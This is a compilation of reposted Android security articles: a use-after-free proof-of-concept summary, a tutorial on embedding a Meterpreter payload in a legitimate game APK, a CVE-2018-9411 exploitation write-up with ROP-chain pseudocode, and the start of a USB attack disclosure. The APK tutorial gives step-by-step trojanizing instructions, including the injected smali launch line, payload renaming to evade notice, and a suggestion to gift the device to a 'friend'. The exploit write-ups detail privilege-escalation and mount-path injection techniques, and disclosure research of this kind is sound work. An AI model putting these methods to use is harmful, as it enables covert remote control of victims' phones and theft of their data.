Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)


As you can see, the session object referenced by mCASSession is used here in order to decrypt, but its reference count does not increase while it is being used. This means that it is possible for the decrypt function to run with a session object which was released, as its reference count was decreased to zero.

This allows an attacker to cause a use-after-free (the session object will be used after it was freed) through a race condition. Before running descramble, the attacker would remove the reference to the session object from the session library, leaving the Descrambler’s mCASSession as the only reference to the session. Then, the attacker would run descramble at the same time as setting the session of the Descrambler to another session, which can cause a race condition. Setting a different session for the Descrambler would release the original session object (its reference count would drop to zero); if this happens in the middle of mCASSession->decrypt, then decrypt would be using a freed session object.

Proof of concept

Before going into the details of the PoC, there is one note about its effect.

In this PoC, nothing gets allocated in place of the released session object; we just let the decrypt function use a freed object. One of the members of the session object that decrypt uses is mKeyLock, which is essentially a mutex that decrypt attempts to lock:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)


As you can expect, when a session object is released, the mutex of its mKeyLock is destroyed. Therefore, when the use-after-free is triggered, decrypt attempts to use an already destroyed mutex.

Interestingly, this is where a recent change comes into place. Up until Android 8.1, attempting to use a destroyed mutex would return an error, which in this case would simply be ignored. Since Android 9, attempting to use a destroyed mutex results in an abort, which crashes the process:

Snippet from bionic/libc/bionic/pthread_mutex.cpp (source)


This means that while the PoC should always cause a use-after-free, only Android 9 has a way to detect whether it worked or not. In older versions, there is no noticeable effect. Therefore, the PoC is mainly intended to run on Android 9.

After covering the effect of the PoC, here is a high-level overview of the actions it performs:

  1. Initialize Cas and Descrambler objects.
  2. Use the Cas object in order to create two sessions: session1 and session2. Both of them will be referenced from the session library.
  3. Link session1 to the Descrambler object, and then use the Cas object in order to remove it from the session library. Now, session1 only has a reference from the Descrambler object; its reference count is one.
  4. At the same time:
    • Run multiple threads which perform descramble through the Descrambler object.
    • Set the session of the Descrambler object to session2.
  5. If running descramble in one of the threads did not return, it means that the PoC was successful and the service crashed. If not, retry again from step 2.

Full source code for the PoC is available on GitHub.


  • 08.2018 – Vulnerability discovered
  • 08.2018 – Vulnerability details + PoC sent to Google
  • 11.2018 – Google distributed patches

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).


Embedding Meterpreter in Android APK

( Original text by Joff Thyer )

Mobile is everywhere these days. So many applications in our daily life are being migrated towards a cloud deployment whereby the front end technology is back to the days of thin clients. As the pendulum swings yet again, our thin client can be anything from a JavaScript browser framework to a mobile enabled frontend such as Objective-C on Apple iOS, or Java based on Android.

Looking at malware, our friends at Apple continue to maintain the 5-guys in a cave paradigm of attempting to vet all apps that enter the iOS app store. While it is a noble effort, there are still instances where malware creeps through the door. Unlike Apple, the Android marketplace is an open approach that allows anyone to contribute to the play store, and moreover represents a majority of the mobile market share. In addition, there are various third party sites that allow direct download of Android applications package files (APK’s).

The Metasploit project allows a pentester to generate Android payloads with a pretty highly functional Meterpreter command channel that can be loaded onto an Android device. Typically, this APK will be loaded via side loading through the Android debugger “adb”. From a pen tester perspective, something that is fun to do is to combine a legitimate (perhaps fun) app with Meterpreter, and side load that app onto an Android device. Naturally, you would probably consider sending that device to a “friend” as a gift or some similar social engineering ruse.

Android applications are written in Java which compiles down to a Dalvik executable format known as DEX. The compiled version of an application is a ZIP file of DEX bytecode files. The Dalvik virtual machine on Android has been more recently replaced with Android RunTime (ART) which performs additional optimization and compiles the DEX bytecode into native assembly code. The Dalvik VM primarily performs Just In Time (JIT) interpretation of the majority of bytecode. ART is higher performing than the Dalvik virtual machine which only optimized portions of the bytecode for frequently executed parts of the app.

Smali/baksmali is an assembler/disassembler for Android DEX bytecode. An Android tool named “apktool” enables the disassembling of zipped DEX (APK files) into smali files, and the reassembling of smali files back to DEX and subsequently to the zipped APK format. We can use this tool to disassemble and modify an existing APK file. In this context, we can use it to add an additional static entry point into the smali code of the initial Android Activity to kick off our Meterpreter.

Overall the steps to embed a Meterpreter into an existing APK file are as follows:

  1. Find an existing fun APK application on “” or similar mirror site.
  2. Generate the Metasploit APK file.
  3. Disassemble with “apktool” both the Metasploit APK file, and the APK file we are intending to modify.
  4. Copy all of the Meterpreter smali code over to the new APK smali directory.
  5. Find the entrypoint of the code within the APK application’s AndroidManifest.xml file by looking for the intent-filter with the line:
    <action android:name="android.intent.action.MAIN"/>

    The activity name that encloses this intent-filter will be the entrypoint you are seeking.

  6. Modify the activity “.smali” file to include a line that starts up the Meterpreter stage.
  7. Copy all of the Meterpreter permissions from the Meterpreter AndroidManifest.xml into the modified APK’s AndroidManifest.xml.
  8. Re-assemble into DEX zipped format.
  9. Sign the newly created APK file with “jarsigner”, and then side load onto your target Android device.

It is much easier to understand the above steps with a concrete example. To illustrate this, I downloaded an APK file of a game called Cowboy Shooting Game from


Generate Your Malware APK

I then generated a Metasploit APK using the “msfvenom” command as follows.


Disassemble the APK Files

Both files were then disassembled (baksmaling!!!) using the “apktool” as follows:



Copy the Malware Code Into the Cowboy Tools Game

An easy way to do this is to change directory into the Metasploit APK directory, then copy all of the files under the “smali” directory into the “com.CowboyShootingGames_2018-09-22” directory. An old trick I learned from a systems administrator for copying entire directory trees with the “tar” command comes in handy: you pipe the output of tar into a second command which changes directory and “untars” the resulting files.
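The tar pipe trick looks like this; the directory names here are stand-ins for the two disassembled APK trees:

```shell
# Stand-in trees for the Metasploit APK and the game APK
mkdir -p /tmp/msf-apk/smali/com/metasploit/stage /tmp/game-apk/smali
echo ".class Payload" > /tmp/msf-apk/smali/com/metasploit/stage/Payload.smali
# Copy the whole smali tree: tar to stdout, untar in the destination directory
( cd /tmp/msf-apk && tar cf - smali ) | ( cd /tmp/game-apk && tar xf - )
ls /tmp/game-apk/smali/com/metasploit/stage
```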


Find the Activity EntryPoint

Below we can see that the entry activity is listed as “com.CowboyShootingGames.MainActivity”. We know this because the XML contains an intent-filter with “android.intent.action.MAIN” within it.


Modify the Activity EntryPoint Smali File

As can be seen above, in this case the file is going to be named “MainActivity.smali”, and will be located in the “com/CowboyShootingGames” directory as per the periods (“.”) in the fully qualified class path.


Within the “MainActivity.smali” file, we are looking for the “onCreate()” method.

We need to add a single line of “smali” code right below the “onCreate()” method call to invoke our Meterpreter stage.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Please note that the above is a single line of code. It is possible to obfuscate by using a different path name than “com/metasploit/stage/Payload”; however, if you do that, you will have to modify all references to the path in all of the “smali” files contained in the “Payload” directory, and change the directory name itself. This can be done manually but is prone to error. Continuing without any obfuscation for a moment, the final result after modification will look like the screenshot below.



Add Permissions to the Modified APK “AndroidManifest.xml” File

For the next step, use “grep” to extract all of the lines in the Metasploit “AndroidManifest.xml” file that contain the strings “uses-permission” and “uses-feature”, and copy them into the modified APK’s AndroidManifest.xml file.


You will need to use an editor to insert the permissions at the appropriate place in the new “AndroidManifest.xml” file. Search for an existing “uses-permission” line as your guideline for where to insert the text.


You might end up with some duplicate permissions. You can optionally remove them but it really does not matter.

Build the New APK Package File

Now use the “apktool” again to re-assemble the resulting APK package file. The end result will be written into a “dist” directory within the APK directory itself.


Re-Sign the Resulting Package File

For resigning, one easy method is to use the Android debugging keystore which is built if you install Android studio. The debugging keystore will be contained within the “.android” hidden directory in your home directory on a UN*X system.


An alternative method is to use the Java “keytool” to generate your own self-signed keystore and sign it using the “jarsigner” tool as shown in the screenshots below.


At this point in time, the “final.apk” file is ready to be loaded onto an Android system using “adb”.

In this specific case, I am running a copy of “GenyMotion” which is an x86 based emulator that uses VirtualBox for a very high performing Android emulation. One of the challenges you might immediately run into is that the x86 emulation will not natively support the ARM processor. To get around this challenge, there are some ARM translation libraries available online. You would need to search for “” and then drag the ZIP file onto a running GenyMotion Android system. Unfortunately, this is not 100% reliable, and some app crashes may still result.

One certain way to make sure an ARM APK file runs on a device is to use a hardware device itself. I have found that the Nexus 6 series of devices are nice to work with as the “rooting” kit is fairly reliable, and attaching via a USB cable for testing is not too onerous.


The final step is of course to try out our newly infected Cowboy Shooting game. We find out quickly, that the moment we launch the game, we get a Meterpreter shell on our KALI system which just feels so right.


I really don’t think I am going to take the time to learn this game, which frankly was just a random pick from “”.

So Many Complicated Steps… so much can go wrong…

So after performing all of the requisite steps above, I was immediately frustrated. There are so many moving parts that the chances of error are pretty high. There are likely other tools out there which are available to use but I decided to whip up a quick Python script to automate this process. I called it “” and I will warn you now, this is definitely a quick and dirty effort to get something to do the job without much effort on hardening the logic at all.


The idea of “” is that if you supply a Metasploit generated APK file, an original APK to modify, and a keystore, it will perform all of the steps in an automated fashion and generate the result for you.

Below is an example of running the tool. All of the temporary files, and output will be stored in the “~/.ae” directory.


The tool also will remove the “metasploit” directory name and obfuscate it with a random string directory name automatically. You can see this result in the below screenshot in which I listed the contents of the APK “smali/com” directory. The directory named “dbarpubw” actually contains the Metasploit stager code.


There is much continuing fun to be had with mobile apps, and their associated application programming interfaces. It is a good idea to get familiar with the platforms as a pen tester as you will undoubtedly encounter a need to test in the mobile space before long.

I suppose you just might want to play with “Android EmbedIT” now! Well if you do, you can download from my github by visiting

Keep calm, and hack all the mobile things. ~Joff


CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services

( Original text by Tamir Zahavi-Brunner )


As part of our platform research in Zimperium zLabs, I have recently disclosed to Google a critical vulnerability affecting multiple high-privileged Android services. Google designated it as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), including additional patches in the September security update (2018-09-01 patch level).

I also wrote a proof-of-concept exploit for this vulnerability, demonstrating how it can be used in order to elevate permissions from the context of a regular unprivileged app.

In this blog post, I will cover the technical details of the vulnerability and the exploit. I will start by explaining some background information related to the vulnerability, followed by the details of the vulnerability itself. I will then describe why I chose a particular service as the target for the exploit over other services that are affected by the vulnerability. I will also analyze the service itself in relation to the vulnerability. Lastly, I will cover the details of the exploit I wrote.

Project Treble

Project Treble introduces plenty of changes to how Android operates internally. One massive change is the split of many system services. Previously, services contained both AOSP (Android Open Source Project) and vendor code. After Project Treble, these services were all split into one AOSP service and one or more vendor services, called HAL services. For more background information, the separation between services is described more thoroughly in my BSidesLV talk and in my previous blog post.


The separation of Project Treble introduces an increase in the overall amount of IPC (inter-process communication); data which was previously passed within the same process between AOSP and vendor code must now pass through IPC between AOSP and HAL services. As most IPC in Android goes through Binder, Google decided that the new IPC should do so as well.

But simply using the existing Binder code was not enough; Google also decided to perform some modifications. First, they introduced multiple Binder domains in order to separate this new type of IPC from others. More importantly, they introduced HIDL – a whole new format for the data passed through Binder IPC. This new format is supported by a new set of libraries, and is dedicated to the new Binder domain for IPC between AOSP and HAL services. Other Binder domains still use the old format.

The operation of the new HIDL format compared to the old one is a bit like layers. The underlying layer in both cases is the Binder kernel driver, but the top layer is different. For communication between HAL and AOSP services, the new set of libraries is used; for other types of communication, the old set of libraries is used. Both sets of libraries contain very similar code, to the point that some of the original code was even copied to the new HIDL libraries (although personally I could not find a good reason for copy-pasting code here, which is generally not a good practice). The usage of each of these libraries is not exactly the same (you cannot simply substitute one with another), but it is still very similar.

Both sets of libraries represent data that transfers in Binder transactions as C++ objects. This means that HIDL introduces its own new implementation for many types of objects, from relatively simple ones like objects that represent strings to more complex implementations like file descriptors or references to other services.

Sharing memory

One important aspect of Binder IPC is the use of shared memory. In order to maintain simplicity and good performance, Binder limits each transaction to a maximum size of 1MB. For situations where processes wish to share larger amounts of data between each other through Binder, shared memory is used.

In order to share memory through Binder, processes utilize Binder’s feature of sharing file descriptors. The fact that file descriptors can be mapped to memory using mmap allows multiple processes to share the same memory region by sharing a file descriptor. One issue here with regular Linux (non-Android) is that file descriptors are normally backed by files; what if processes want to share anonymous memory regions? For that reason, Android has ashmem, which allows processes to allocate memory to back file descriptors without an actual file involved.

Sharing memory through Binder is an example of different implementations between HIDL and the old set of libraries. In both cases the eventual actions are the same: one process maps an ashmem file descriptor in its memory space, transfers that file descriptor to another process through Binder and then that other process maps it in its own memory space. But the implementations for the objects which handle this are different.

In HIDL’s case, an important object for sharing memory is hidl_memory. As described in the source code: “hidl_memory is a structure that can be used to transfer pieces of shared memory between processes”.

The vulnerability

Let’s take a closer look at hidl_memory by looking at its members:

Snippet from system/libhidl/base/include/hidl/HidlSupport.h (source)
  • mHandle – a handle, which is a HIDL object that holds file descriptors (only one file descriptor in this case).
  • mSize – the size of the memory to be shared.
  • mName – supposed to represent the type of memory, but only the ashmem type is really relevant here.

When transferring structures like this through Binder in HIDL, complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data, while simple types (like integers) are transferred “as is”. This means that the size is transferred as a 64 bit integer. On the other hand, in the old set of libraries, a 32 bit integer is used.

This seems rather strange, why should the size of the memory be 64 bit? First of all, why not do the same as in the old set of libraries? But more importantly, how would a 32 bit process handle this? Let’s check this by taking a look at the code which maps a hidl_memory object (for the ashmem type):

Snippet from system/libhidl/transport/memory/1.0/default/AshmemMapper.cpp (source)

Interesting! Nothing about 32 bit processes, and not even a mention that the size is 64 bit.

So what happens here? The type of the length field in mmap’s signature is size_t, which means that its bitness matches the bitness of the process. In 64 bit processes there are no issues, everything is simply 64 bit. In 32 bit processes on the other hand, the size is truncated to 32 bit, so only the lower 32 bits are used.

This means that if a 32 bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actual mapped memory region will be much smaller. For instance, for a hidl_memory with a size of 0x100001000, the size of the memory region will only be 0x1000. In this scenario, if the 32 bit process performs bounds checks based on the hidl_memory size, they will hopelessly fail, as they will falsely indicate that the memory region spans over more than the entire memory space. This is the vulnerability!
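The truncation is easy to check with quick arithmetic (shell used here purely as a calculator; in the service it happens when the 64-bit size is passed into a 32-bit process’s mmap, whose size_t is 32 bits wide):

```shell
size=$(( 0x100001000 ))           # hidl_memory size sent by the attacker
mapped=$(( size & 0xFFFFFFFF ))   # what survives in a 32-bit size_t
printf '0x%x\n' "$mapped"         # -> 0x1000
```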

Finding a target

We have a vulnerability; let’s now try to find a target. We are looking for a HAL service which meets the following criteria:

  1. Compiles to 32 bit.
  2. Receives shared memory as input.
  3. When performing bounds check on the shared memory, does not truncate the size as well. For example, the following code is not vulnerable, as it performs bounds check on a truncated size_t:

These are the essential requirements for this vulnerability, but there are some more optional ones which I think make for a more interesting target:

  1. Has a default implementation in AOSP. While ultimately vendors are in charge of all HAL services, AOSP does contain default implementations for some, which vendors can use. I found that in many cases when such an implementation exists, vendors are reluctant to modify it and end up simply using it as is. This makes such a target more interesting, as it can be relevant to multiple vendors, as opposed to a vendor-specific service.

One thing you should note is that even though HAL services are supposed to only be accessible by other system services, this is not really the truth. There are a select few HAL services which are in fact accessible by regular unprivileged apps, each for its own reason. Therefore, the last requirement for the target is:

  1. Directly accessible from an unprivileged app. Otherwise this makes everything a bit hypothetical, as we will be talking about a target which is only accessible in case you already compromise another service.

Luckily, there is one HAL service which meets all these requirements: android.hardware.cas, AKA MediaCasService.


CAS stands for Conditional Access System. CAS in itself is mostly out of the scope of this blog post, but in general, it is similar to DRM (so much so that the differences are not always clear). Simplistically, it functions in the same way as DRM – there is encrypted data which needs to be decrypted.


First and foremost, MediaCasService indeed allows apps to decrypt encrypted data. If you read my previous blog post, which dealt with a vulnerability in a service called MediaDrmServer, you might notice that there is a reason for the comparison with DRM. MediaCasService is extremely similar to MediaDrmServer (the service in charge of decrypting DRM media), from its API to the way it operates internally.

A slight change from MediaDrmServer is the terminology: instead of decrypt, the API is called descramble (although they do end up calling it decrypt internally as well).

Let’s take a look at how the descramble method operates (note that I am omitting some minor parts here in order to simplify things):

Unsurprisingly, data is shared over shared memory. There is a buffer indicating where the relevant part of the shared memory is (called srcBuffer, but is relevant for both source and destination). On this buffer, there are offsets to where the service reads the source data from and where it writes the destination data to. It is possible to indicate that the source data is in fact clear and not encrypted, in which case the service will simply copy data from source to destination without modifying it.

This looks great for the vulnerability! At least if the service only uses the hidl_memory size in order to verify that it all fits inside the shared memory, and not other parameters. In that case, by letting the service believe that our small memory region spans over its entire memory space, we could circumvent the bounds checks and put the source and destination offsets anywhere we like. This should give us full read+write access to the service memory, as we could read from anywhere to our shared memory and write from our shared memory to anywhere. Note that negative offsets should also work here, as even 0xFFFFFFFF (-1) would be less than the hidl_memory size.

Let’s verify that this is indeed the case by looking at descramble’s code. Quick note: the function validateRangeForSize simply checks that “first_param + second_param <= third_param” while minding possible overflows.

Snippet from hardware/interfaces/cas/1.0/default/DescramblerImpl.cpp (source)

As you can see, the code checks that srcBuffer lies inside the shared memory based on the hidl_memory size. After this the hidl_memory is not used anymore and the rest of the checks are performed against srcBuffer itself. Perfect! All we need then in order to achieve full read+write access is to use the vulnerability and then set srcBuffer’s size to more than 0xFFFFFFFF. This way, any value for the source and destination offsets would be valid.

Using the vulnerability for out-of-bounds read


Using the vulnerability for out-of-bounds write

The TEE device

Before writing an exploit using this (very good) primitive, let’s think about what we really want this exploit to achieve. A look at the SELinux rules for this service shows that it is in fact heavily restricted and does not have a lot of permissions. Still, it has one interesting permission that a regular unprivileged app does not have: access to the TEE (Trusted Execution Environment) device.

This permission is extremely interesting as it lets an attacker access a wide variety of things: different device drivers for different vendors, different TrustZone operating systems and a large amount of trustlets. In my previous blog post, I have already discussed how dangerous this permission can be.

While there are indeed many things you can do with access to the TEE device, at this point I merely wanted to prove that I could get this access. Hence, my objective was to perform a simple operation which requires access to the TEE device. In the Qualcomm TEE device driver, there is a fairly simple ioctl which queries for the version of the QSEOS running on the device. Therefore, my target when building the exploit for MediaCasService was to run this ioctl and get its result.

The exploit

Note: My exploit is for a specific device and build – Pixel 2 with the May 2018 security update (build fingerprint: “google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys”). A link to the full exploit code is available at the end of the blog post.

So far we have full read+write over the target process memory. While this is a great primitive, there are two issues that need to be solved:

  • ASLR – while we do have full read access, it is only relative to where our shared memory was mapped; we do not know where it is compared to other data in memory. Ideally, we would like to find the address of the shared memory as well as addresses of other interesting data.
  • For each execution of the vulnerability, the shared memory gets mapped and then unmapped after the operation. There is no guarantee that the shared memory will get mapped in the same location each time; it is entirely possible that another memory region will take its place between executions.

Let’s take a look at some of the memory maps of the linker in the service memory space for this specific build:

As you can see, the linker happens to create a small gap of 2 memory pages (0x2000) between linker_alloc_small_objects and linker_alloc. The addresses for these memory maps are relatively high; all libraries loaded by this process are mapped to lower addresses. This means that this gap is the highest gap in memory. Since mmap’s behavior is to try to map to high addresses before low addresses, any attempt to map a memory region of 2 pages or less should be mapped in this gap. Luckily, the service does not normally map anything so small, which means that this gap should stay there. This solves our second issue, as this is a deterministic location in memory where our shared memory will always be mapped.

Let’s look at the data in the linker_alloc straight after the gap:

The linker data here happens to be extremely helpful for us; it contains addresses which easily indicate the address of the linker_alloc memory region. Since the vulnerability gives us relative read, and we already concluded that our shared memory will be mapped straight before this linker_alloc, we can use it to determine the address of the shared memory. If we take the address at offset 0x40 and subtract 0x10 from it, we get the linker_alloc address. Subtracting the size of the shared memory itself then yields the shared memory address.

So far we have solved the second issue, but only partially solved the first. We have the address of our shared memory, but not of other interesting data. But what other data are we interested in?

Hijacking a thread

One part of the MediaCasService API is the ability for clients to provide listeners to events. If a client provides a listener, it will be notified when different CAS events occur. A client can also trigger events by its own, which will then be sent back to the listener. The way this works through Binder and HIDL is that when the service sends an event to the listener, it will wait until the listener finished processing the event; a thread will be blocked waiting for the listener.

Flow of triggering an event

This is great for us; we can cause a thread in the service to block waiting for us, in a known, pre-determined state. Once we have a thread in this state, we can modify its stack in order to hijack it; only once we are done do we resume the thread by letting it finish processing the event. But how do we find the thread stack in memory?

Since our deterministic shared memory address is so high, the distance between it and possible locations of the blocked thread's stack is large. ASLR makes it too unreliable to find the thread stack relative to our deterministic address, so we take another approach: we use a bigger shared memory and have it mapped before the blocked thread's stack, so that we can reach the stack relatively through the vulnerability.

Instead of only getting one thread to that blocked state, we get multiple (5) threads. This causes more threads to be created, with more thread stacks allocated. By doing this, if there are a few thread-stack-sized gaps in memory, they should be filled, and at least one thread stack in a blocked thread should be mapped at a low address, without any library mapped before it (remember, mmap’s behavior is to map regions at high addresses before low addresses). Then, ideally, if we use a large shared memory, it should be mapped before that.

MediaCasService memory map after filling gaps and mapping our shared memory

One drawback is that there is a chance that other unexpected things (like jemalloc heap) will get mapped in the middle, so the blocked thread stack won’t be where we expect it to be. There could be multiple approaches to solve this. I decided to simply crash the service (using the vulnerability in order to write to an unmapped address) and try again, as every time the service crashes it simply restarts. In any case, this scenario normally does not happen, and even when it does, one retry is usually enough.

Once our shared memory is mapped before the blocked thread stack, we use the vulnerability to read two things from the thread stack:

  • The thread stack address, using pthread metadata which lies in the same memory region after the stack itself.
  • The address where libc is mapped, in order to later build a ROP chain using both gadgets and symbols in libc (libc has enough gadgets). We do this by reading a return address pointing to a specific location in libc, which is present on the thread stack.

Data read from thread stack

From now on, we can read and write to the thread stack using the vulnerability. We have both the address of the deterministic shared memory location and the address of the thread stack, so by using the difference between the addresses we can reach the thread stack from our shared memory (the small one with deterministic location).

ROP chain

We have full access to a blocked thread stack which we can resume, so the next step is to execute a ROP chain. We know exactly which part of the stack to overwrite with our ROP chain, as we know the exact state that the thread is blocked at. After overwriting part of the stack, we can resume the thread so the ROP chain is executed.

Unfortunately, the SELinux limitations on this process prevent us from turning this ROP chain into full arbitrary code execution. There is no execmem permission, so anonymous memory cannot be mapped as executable, and we have no control over file types which can be mapped as executable. In this case, the objective is pretty simple (running a single ioctl), so I simply wrote a ROP chain which does this. In theory, if you want to perform more complex stuff, the primitive is so strong that it should still be possible. For instance, if you want to perform complex logic based on a result of a function, you could perform multi-stage ROP: perform one ROP chain which runs that function and writes its result somewhere, read that result, perform the complex logic in your own process and then run another ROP chain based on that.

As was previously mentioned, the objective is to obtain the QSEOS version. Here is the code that is essentially performed by the ROP chain in order to do that:
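A sketch of what the chain effectively executes; note that the /dev/qseecom path and the ioctl name are assumptions based on the public Qualcomm qseecom driver interface, not taken from the exploit itself:

```
// C-like pseudocode of the hijacked thread's work
fd = open("/dev/qseecom", O_RDWR);
ioctl(fd, QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ, stack_addr);  // result lands at stack_addr
sleep(VERY_LONG);  // keep the thread alive so the result can be read back
```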

stack_addr is the address of the memory region of the stack, which is simply an address that we know is writable and will not be overwritten (the stack begins from the bottom and is not close to the top), so we can write the result to that address and then read it using the vulnerability. The sleep at the end is so the thread will not crash immediately after running the ROP chain, so we can read the result.

Building the ROP chain itself is pretty straightforward. There are enough gadgets in libc to perform it and all the symbols are in libc as well, and we already have libc’s address.

After we are done, the process is left in a bit of an unstable state, as we hijacked a thread to execute our ROP chain. In order to leave everything in a clean state, we simply crash the service using the vulnerability (by writing to an unmapped address) in order to let it restart.


As I previously discussed in my BSidesLV talk and in my previous blog post, Google claims that Project Treble benefits Android security. While that is true in many cases, this vulnerability is another example of how elements of Project Treble could lead to the opposite. This vulnerability is in a library introduced specifically as part of Project Treble, and does not exist in a previous library which does pretty much the same thing. This time, the vulnerability is in a commonly used library, so it affects many high-privileged services.

Full exploit code is available on GitHub. Note: the exploit is only provided for educational or defensive purposes; it is not intended for any malicious or offensive use.



I would like to thank Google for their quick and professional response, Adam Donenfeld (@doadam), Ori Karliner (@oriHCX), Rani Idan (@raniXCH), Ziggy (@z4ziggy) and the rest of the Zimperium zLabs team.

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

(Original text by Jann Horn, Google Project Zero)

Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).


After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.
(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)


The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at: ("directory traversal over USB via injection in blkid output") ("privesc zygote->init; chain from USB")


These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn’t necessarily complete):


  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.


This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel’s filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.


The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.


To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:


/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"


However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid’s output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel’s vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:


   if (mFsType != "vfat") {
       LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;
       return -EIO;
   }

   if (vfat::Check(mDevPath)) {
       LOG(ERROR) << getId() << " failed filesystem check";
       return -EIO;
   }

   // Use UUID as stable name, if available
   std::string stableName = getId();
   if (!mFsUuid.empty()) {
       stableName = mFsUuid;
   }

   mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());

   if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
       PLOG(ERROR) << getId() << " failed to create mount points";
       return -errno;
   }

   if (vfat::Mount(mDevPath, mRawPath, false, false, false,
           AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
       PLOG(ERROR) << getId() << " failed to mount " << mDevPath;
       return -EIO;
   }


The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.


This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.


However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:


  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal, insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won’t be permitted to actually interact with the filesystem — for example, the zygote and system_server aren’t allowed to do so. On top of that, processes that don’t have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.

Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you’d then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn’t require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.


After blkid has read parts of the filesystem and used them to determine the filesystem’s type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.


